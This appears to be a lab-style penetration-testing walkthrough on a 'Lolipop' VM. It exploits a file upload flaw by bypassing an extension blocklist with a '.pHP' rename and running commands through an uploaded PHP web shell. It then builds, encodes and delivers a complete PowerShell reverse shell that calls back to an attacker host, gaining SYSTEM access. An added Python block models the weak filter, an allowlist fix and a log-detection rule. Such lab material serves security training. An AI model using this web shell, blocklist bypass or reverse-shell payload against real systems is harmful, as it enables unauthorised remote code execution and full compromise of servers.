Published on March 20, 2025
In this section, we explore a file upload vulnerability that lets us upload and execute files on the web server. As with Directory Traversal and File Inclusion vulnerabilities, knowing how to identify File Upload vulnerabilities is crucial.
Depending on the web application, we can often make educated guesses about where file upload mechanisms might exist. In CMS-based applications, users may be able to upload profile avatars or attach files to blog posts. Company websites often provide upload functionality in career sections or client portals. Enumeration is key to discovering these upload points.
We will now demonstrate how to abuse an upload mechanism to execute arbitrary code and gain a reverse shell. Our target is the "Lolipop" application on the Lolipop VM.
kali@kali:~$ echo "this is a test" > test.txt
After successfully uploading test.txt, we confirm that the application does not restrict file types to images.
Next, we attempt to upload simple-backdoor.php, but the application blocks PHP file uploads.
A common way to bypass blacklists is to modify the file extension. For example, changing .php to .php7, or using uppercase characters in the extension (.pHP), can often bypass simple security measures, because such filters compare the extension case-sensitively against a fixed list of blocked values. Whether the renamed file is then executed depends on how the web server maps extensions to the PHP handler, so the result still has to be verified.
kali@kali:~$ mv simple-backdoor.php simple-backdoor.pHP
By renaming the file and uploading simple-backdoor.pHP, we successfully bypass the restriction.
Once uploaded, we use curl to execute commands through our web shell.
kali@kali:~$ curl http://192.168.50.189/meteor/uploads/simple-backdoor.pHP?cmd=dir
The command output confirms that our shell is active and executing commands on the server.
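As an added example, not part of the original write-up and not the Lolipop application's own code, the following Python models the two sides of what was just shown: the case-sensitive extension blocklist that lets simple-backdoor.pHP and .php7 through beside an allowlist validator with server-side renaming that rejects them, and a detection rule that flags the web-shell requests in constructed access-log lines. The /meteor/uploads/ path, the log format and the client address are assumptions for the example.

```python
import os
import re
import secrets

BLOCKED = {".php"}                            # naive, case-sensitive blocklist
ALLOWED = {".png", ".jpg", ".jpeg", ".gif"}   # allowlist for the hardened check

def blocklist_allows(filename):
    """Weak check modelled on the behaviour observed above: a case-sensitive
    blocklist on the last extension, so '.pHP' and '.php7' pass through."""
    return os.path.splitext(filename)[1] not in BLOCKED

def allowlist_allows(filename):
    """Hardened check: exactly one extension, compared lowercase against an
    allowlist; no path components, double extensions or dotfiles."""
    base = os.path.basename(filename)
    parts = base.lower().split(".")
    return (base == filename and len(parts) == 2 and parts[0] != ""
            and "." + parts[1] in ALLOWED)

def stored_name(filename):
    """Server-chosen on-disk name: only the validated extension is reused, so
    the client-supplied name never reaches the filesystem."""
    if not allowlist_allows(filename):
        raise ValueError(f"rejected upload name: {filename!r}")
    return secrets.token_hex(16) + os.path.splitext(filename.lower())[1]

# Detection side: flag requests that execute a PHP-like file from an uploads
# directory, matching the extension case-insensitively (log lines constructed).
UPLOAD_EXEC = re.compile(
    r'"(?:GET|POST) (/[^" ?]*/uploads/[^" ?]*\.php[0-9]*)(?=[ ?"])(\?[^" ]*)?',
    re.IGNORECASE)
LOG = [
    '10.0.0.5 - - [20/Mar/2025:10:01:02 +0000] "GET /meteor/uploads/avatar.png HTTP/1.1" 200 8812',
    '10.0.0.5 - - [20/Mar/2025:10:02:15 +0000] "GET /meteor/uploads/simple-backdoor.pHP?cmd=dir HTTP/1.1" 200 541',
    '10.0.0.5 - - [20/Mar/2025:10:03:40 +0000] "GET /meteor/uploads/simple-backdoor.pHP?cmd=powershell%20-enc%20JABj HTTP/1.1" 200 12',
]

def flag_upload_execution(lines):
    """Return (path, query) for each request that runs a script under an uploads directory."""
    hits = []
    for line in lines:
        m = UPLOAD_EXEC.search(line)
        if m:
            hits.append((m.group(1), m.group(2) or ""))
    return hits

if __name__ == "__main__":
    print(flag_upload_execution(LOG))
```

The access-log rule is a starting point for a detection; a real deployment would also alert on any file under the upload directory being served with a script handler at all.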
We can now leverage this access to establish a reverse shell.
kali@kali:~$ nc -nvlp 4444
To execute commands remotely, we create and encode a PowerShell reverse shell script.
kali@kali:~$ pwsh
PowerShell 7.1.3
Copyright (c) Microsoft Corporation.
https://aka.ms/powershell
Type 'help' to get help.
PS> $Text = '$client = New-Object System.Net.Sockets.TCPClient("192.168.119.3",4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()'
PS> $Bytes = [System.Text.Encoding]::Unicode.GetBytes($Text)
PS> $EncodedText =[Convert]::ToBase64String($Bytes)
PS> $EncodedText
JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0
...
AYgB5AHQAZQAuAEwAZQBuAGcAdABoACkAOwAkAHMAdAByAGUAYQBtAC4ARgBsAHUAcwBoACgAKQB9ADsAJABjAGwAaQBlAG4AdAAuAEMAbABvAHMAZQAoACkA
PS> exit
kali@kali:~$ curl http://192.168.50.189/meteor/uploads/simple-backdoor.pHP?cmd=powershell%20-enc%20JABjAGwAaQ...
kali@kali:~$ nc -nvlp 4444
listening on [any] 4444 ...
connect to [192.168.119.3] from (UNKNOWN) [192.168.50.189] 50603
PS C:\xampp\htdocs\meteor\uploads> whoami
nt authority\system
The output confirms that we have successfully gained remote control of the system as NT AUTHORITY\SYSTEM.
In this guide, we demonstrated how to exploit a file upload vulnerability to achieve remote code execution. We bypassed security filters, confirmed command execution, and leveraged a PowerShell payload to obtain a reverse shell. This technique is applicable to various web applications with weak file upload restrictions.